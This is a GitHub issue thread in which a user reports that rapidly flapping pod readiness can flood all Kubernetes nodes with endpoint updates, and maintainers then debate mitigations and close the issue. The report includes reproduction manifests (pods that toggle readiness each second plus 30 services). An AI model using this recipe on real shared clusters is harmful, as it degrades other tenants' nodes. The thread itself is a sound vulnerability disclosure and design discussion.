Pods status changes on one worker node can be lerveraged to make flooding attack to all other nodes in the kubernetes cluster #110596

younaman · 2022-06-15T08:05:32Z

What happened?

In a Kubernetes cluster, each node has its Kube-proxy and kubelet components. For Kube-proxy, it will watch the modification of service/endpoints informed by API-server, and update local iptables; For Kubelet, it will send messages to Kube-apiserver when local pods' status change.

So, when a pod status related to a service/endpoints has changed on a worker node, the worker node's kubelet will send messages to the Kube-apiserver on the control plane, while the Kube-apiserver received the pod's status change, it will update the status of the related endpoint in etcd, and push related endpoint changes message to all other nodes' Kube-proxy, all other nodes' Kube-proxy will modify its local iptables.

As a result, a malicious user's service can change its pods status, trigger the Kube-apiserver push endpoint changes to all other nodes, making processes (iptables, calico, etc.) on other nodes consume CPU/memory resources, making flooding attack.

What did you expect to happen?

We have reported a similar DoS issue to Kubernetes hackone.com, however, HackerOne said that: "all Denial-of-Service findings are out-of-scope". So I try to write my issue on GitHub and I want to know that:

Is it a real issue?
If it is a real issue, are there any ways to defend against this problem fundamentally?
As far as I am concerned, the problem is intrinsic to Kubernetes Kube-proxy design, if it is a real issue, does Kubernetes plan to mitigate this issue at least?

How can we reproduce it (as minimally and precisely as possible)?

Deploy 10 malicious pods on one worker node, the template pod.yaml just like this:

apiVersion: v1
kind: Pod
metadata:
  name: test-readiness-1
  namespace: nginx-test
  labels:
    app: nginx-1
spec:
  nodeName: younaman-thinkpad
  containers:
  - name: nginx
    image: nginx
    args:
    - /bin/sh
    - -c
    - while true;do touch /tmp/healthy;sleep 1;rm -rf /tmp/healthy;sleep 1;done
    readinessProbe:
      exec:
        command:
        - cat
        - /tmp/healthy
      initialDelaySeconds: 1
      periodSeconds: 1
      failureThreshold: 1
      timeoutSeconds: 1
      successThreshold: 1
    imagePullPolicy: IfNotPresent
    ports:
    - containerPort: 80

These 10 pods are all on younaman-thinkpad worker node, and try to change the pod's ready status per second.
2. Deploy one deployment that has 90 pods, all these 90 pods, and the former 10 pods both have label: nginx-1

apiVersion: apps/v1
kind: Deployment
metadata:
  namespace: nginx-test
  name: nginx-normal-deployment
spec:
  selector:
    matchLabels:
      app: nginx-1
  replicas: 90
  template:
    metadata:
      labels:
        app: nginx-1
    spec:
      nodeName: younaman-thinkpad
      restartPolicy: Always
      containers:
      - name: nginx
        image: nginx
        imagePullPolicy: IfNotPresent
        ports:
        - containerPort: 80

Deploy 30 services, each of them corresponding to the former nginx-1 pods group, in other words, I leverage 30 services to create 30 endpoints.

apiVersion: v1
kind: Service
metadata:
  namespace: nginx-test
  name: nginx-service-1
spec:
  selector:
    app: nginx-1
  ports:
  - protocol: TCP
    port: 80
    targetPort: 80

apiVersion: v1
kind: Service
metadata:
  namespace: nginx-test
  name: nginx-service-2
spec:
  selector:
    app: nginx-1
  ports:
  - protocol: TCP
    port: 80
    targetPort: 80
...

On our local testbed,(1 master, 2 worker node, each has 4 core CPU and 8GB memory), by doing like this, on the control plane node, the api-server/etcd/calico etc. processes will consume 60% CPU resources, on the other worker nodes, the calico/kube-proxy/iptables etc. processes will consume 20% CPU, and the incoming network bandwidth on other worker nodes is 1M/s. All these mean a flooding attack.

Anything else we need to know?

No response

Kubernetes version

$ kubectl version
Client Version: version.Info{Major:"1", Minor:"21", GitVersion:"v1.21.1", GitCommit:"5e58841cce77d4bc13713ad2b91fa0d961e69192", GitTreeState:"clean", BuildDate:"2021-05-12T14:18:45Z", GoVersion:"go1.16.4", Compiler:"gc", Platform:"linux/amd64"}
Server Version: version.Info{Major:"1", Minor:"21", GitVersion:"v1.21.1", GitCommit:"5e58841cce77d4bc13713ad2b91fa0d961e69192", GitTreeState:"clean", BuildDate:"2021-05-12T14:12:29Z", GoVersion:"go1.16.4", Compiler:"gc", Platform:"linux/amd64"}

Cloud provider

OS version

# On Linux:
$ cat /etc/os-release
# paste output here
$ uname -a
# paste output here

# On Windows:
C:\> wmic os get Caption, Version, BuildNumber, OSArchitecture
# paste output here

Install tools

Container runtime (CRI) and version (if applicable)

Related plugins (CNI, CSI, ...) and versions (if applicable)

The text was updated successfully, but these errors were encountered:

k8s-ci-robot · 2022-06-15T08:05:40Z

@younaman: This issue is currently awaiting triage.

If a SIG or subproject determines this is a relevant issue, they will accept it by applying the triage/accepted label and provide further guidance.

The triage/accepted label can be added by org members by writing /triage accepted in a comment.

Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes/test-infra repository.

wangyysde · 2022-06-15T09:40:28Z

/cc @wangyysde

neolit123 · 2022-06-15T15:57:48Z

/sig security network

younaman · 2022-06-16T14:47:14Z

Knock knock! Are there any updates or comments?

younaman · 2022-06-17T03:58:21Z

@aojea @chrisohaver @neolit123 @pacoxu Are there any suggestions or comments about my questions? Looking forward to your reply :)

younaman · 2022-06-20T02:16:35Z

@wangyysde @aojea @chrisohaver @neolit123 @pacoxu It has been 5 days and are there any suggestions or comments about my questions? Looking forward to your reply :)

chrisohaver · 2022-06-20T02:29:18Z

I’m not knowledgeable enough on the subject to answer.

younaman · 2022-06-20T02:55:18Z

@chrisohaver Thanks for your reply! Because you are the Kubernetes contributor, so I want to know that have you know someone who can give me some comments? Looking forward to your reply!

pacoxu · 2022-06-20T03:06:33Z

For security issues, I think you can submit it to https://hackerone.com/kubernetes/thanks?type=team.

For me, I think what we can do on this:

add a Quota to limit service creating
monitoring for pod continuously restart or recreate and add alert(pod backoff is a warning event, and many warning events should be an alert.)
if this is a batch of short-term-running jobs with service/endpoints, this may be expected. It depends.

younaman · 2022-06-20T03:20:52Z

@pacoxu I reported similar DoS issue to hackerone.com, however, hackerone told me that "DoS attacks is out of scope." Are you sure that my report will not get a similar "out of scope?"

By the way, thanks for your mitigation suggestions! However, I want to know the answers to my questions:

Is it a real issue?
If it is a real issue, are there any ways to defend against this problem fundamentally?
(You have offered me some mitigation suggestions:) Thank you again for that!)
As far as I am concerned, the problem is intrinsic to Kubernetes Kube-proxy design, if it is a real issue, does Kubernetes plan to mitigate this issue at least?

pacoxu · 2022-06-20T03:36:08Z

I'm not sure. 😓

thockin · 2022-06-22T23:57:20Z

It's hard to call this an "issue". We need to be able to fail readiness on pods and we need to be able to update the endpoints on every client (node) in a reasonably short time window. Otherwise we end up routing traffic to dead endpoints.

EndpointSlice was designed to mitigate some of the impact here, but ultimately the updates must flow.

kube-proxy has a rate-limited write to iptables, so it can only do that every so often (though looking at it, that default may be too low).

The best we could do would be to rate limit updates per namespace or something like that.

I'llleave this open to discuss, but it's not a super compelling option.

younaman · 2022-06-23T02:00:29Z

@thockin Thanks for your comments and suggestions!

I have read the kube-proxy official document. I noticed that the minimum interval of how often the iptables rules can be refreshed as endpoints and services change is 1s. In my attack, I didn't change the default interval and it do make a flooding attack on other nodes. It is a "problem" or so-called "configuration problem" at least, do you agree with my opinion?
By the way, in my opinion, this problem is intrinsic to the kube-proxy design. The information channel leveraged by this flooding attack will exist forever if you need to leverage the kube-proxy to sync endpoints status to other worker nodes no matter how often the interval is?
"The best we could do would be to rate limit updates per namespace or something like that.". It's a good point! Perhaps we can make the minimum interval per namespace or per service? However, I am concerned that this potential solution may carry out "unnecessary trouble" for Kubernetes admin or namespace's owner.
Perhaps we can add a comment or warning in the Kubernetes official document about the minimal interval at least? Most people may not realize this potential risk carried out by the default interval configuration?

Looking forward to your reply!

danwinship · 2022-06-23T16:14:57Z

#110268 may help this by making each iptables-restore call much smaller

thockin · 2022-06-23T17:19:45Z

It is a "problem" or so-called "configuration problem" at least, do you agree with my opinion?

The problem is, I think, that it's a purely static config. We could consider something more dynamic, like the holdoff period being proportional to how long the run took. If it takes 10 seconds to sync, we should probably hold off more than if it takes 0.3 seconds. I think. It could also be dynamic based on offender - we could consider "rare" events to be more urgent and "common" ones to be eligible for backoff. We could even get really smart and say "this particular endpoint seems to be flapping, so we leave it disabled longer". This is a significant change - it will require local decision making and caching and expiry.

It's not clear that this is justified, yet. I have not seen a lot of reports of this being a real problem in the wild. I'm in favor of considering options, but I haven't yet come up with one that is obviously right.

younaman · 2022-06-24T02:49:10Z

@thockin Thanks for your reply! It is a hard choice between flexibility and security :)Besides, please notice the second point I comment: "The information channel leveraged by this flooding attack will exist forever if you need to leverage the kube-proxy to sync endpoints status to other worker nodes no matter how often the interval is?" Perhaps this problem is intrinsic to kube-proxy design and there does not exist a silver bullet to solve this problem fundamentally?

k8s-triage-robot · 2022-09-22T03:36:01Z

The Kubernetes project currently lacks enough contributors to adequately respond to all issues and PRs.

This bot triages issues and PRs according to the following rules:

After 90d of inactivity, lifecycle/stale is applied
After 30d of inactivity since lifecycle/stale was applied, lifecycle/rotten is applied
After 30d of inactivity since lifecycle/rotten was applied, the issue is closed

You can:

Mark this issue or PR as fresh with /remove-lifecycle stale
Mark this issue or PR as rotten with /lifecycle rotten
Close this issue or PR with /close
Offer to help out with Issue Triage

Please send feedback to sig-contributor-experience at kubernetes/community.

/lifecycle stale

khenidak · 2022-09-26T16:59:06Z

to add, pod status update is a privileged api. Having said that. it is unlikely that pod status will change every second unless somebody is presenting itself of a kubelet like privilege api-server and is patching pod object on a tight loop. Both kubelet (the upstream patching side), api-server, and kube-proxy run with rate limits that should prevent that.

aojea · 2022-09-26T21:11:42Z

/close

there is no evidence of DoS attack , just a way to generate more change of status and consume more resources

k8s-ci-robot · 2022-09-26T21:11:47Z

@aojea: Closing this issue.

In response to this:

/close

there is no evidence of DoS attack , just a way to generate more change of status and consume more resources

Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes/test-infra repository.

younaman added the kind/bug Categorizes issue or PR as related to a bug. label Jun 15, 2022

k8s-ci-robot added needs-sig Indicates an issue or PR lacks a `sig/foo` label and requires one. needs-triage Indicates an issue or PR lacks a `triage/foo` label and requires one. labels Jun 15, 2022

younaman changed the title ~~Endpoints's status changes on one worker node can make flooding attack to all other nodes in the kubernetes cluster~~ Pods status changes on one worker node can be lerveraged to make flooding attack to all other nodes in the kubernetes cluster Jun 15, 2022

k8s-ci-robot added sig/security Categorizes an issue or PR as relevant to SIG Security. sig/network Categorizes an issue or PR as relevant to SIG Network. and removed needs-sig Indicates an issue or PR lacks a `sig/foo` label and requires one. labels Jun 15, 2022

thockin added triage/accepted Indicates an issue or PR is ready to be actively worked on. and removed needs-triage Indicates an issue or PR lacks a `triage/foo` label and requires one. labels Jun 23, 2022

k8s-ci-robot added the lifecycle/stale Denotes an issue or PR has remained open with no activity and has become stale. label Sep 22, 2022

k8s-ci-robot closed this as completed Sep 26, 2022

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Pods status changes on one worker node can be lerveraged to make flooding attack to all other nodes in the kubernetes cluster #110596

Pods status changes on one worker node can be lerveraged to make flooding attack to all other nodes in the kubernetes cluster #110596

younaman commented Jun 15, 2022

k8s-ci-robot commented Jun 15, 2022

wangyysde commented Jun 15, 2022

neolit123 commented Jun 15, 2022

younaman commented Jun 16, 2022

younaman commented Jun 17, 2022

younaman commented Jun 20, 2022

chrisohaver commented Jun 20, 2022

younaman commented Jun 20, 2022

pacoxu commented Jun 20, 2022 •

edited

younaman commented Jun 20, 2022

pacoxu commented Jun 20, 2022

thockin commented Jun 22, 2022

younaman commented Jun 23, 2022

danwinship commented Jun 23, 2022

thockin commented Jun 23, 2022

younaman commented Jun 24, 2022

k8s-triage-robot commented Sep 22, 2022

khenidak commented Sep 26, 2022

aojea commented Sep 26, 2022

k8s-ci-robot commented Sep 26, 2022

Pods status changes on one worker node can be lerveraged to make flooding attack to all other nodes in the kubernetes cluster #110596

Pods status changes on one worker node can be lerveraged to make flooding attack to all other nodes in the kubernetes cluster #110596

Comments

younaman commented Jun 15, 2022

What happened?

What did you expect to happen?

How can we reproduce it (as minimally and precisely as possible)?

Anything else we need to know?

Kubernetes version

Cloud provider

OS version

Install tools

Container runtime (CRI) and version (if applicable)

Related plugins (CNI, CSI, ...) and versions (if applicable)

k8s-ci-robot commented Jun 15, 2022

wangyysde commented Jun 15, 2022

neolit123 commented Jun 15, 2022

younaman commented Jun 16, 2022

younaman commented Jun 17, 2022

younaman commented Jun 20, 2022

chrisohaver commented Jun 20, 2022

younaman commented Jun 20, 2022

pacoxu commented Jun 20, 2022 • edited

younaman commented Jun 20, 2022

pacoxu commented Jun 20, 2022

thockin commented Jun 22, 2022

younaman commented Jun 23, 2022

danwinship commented Jun 23, 2022

thockin commented Jun 23, 2022

younaman commented Jun 24, 2022

k8s-triage-robot commented Sep 22, 2022

khenidak commented Sep 26, 2022

aojea commented Sep 26, 2022

k8s-ci-robot commented Sep 26, 2022

pacoxu commented Jun 20, 2022 •

edited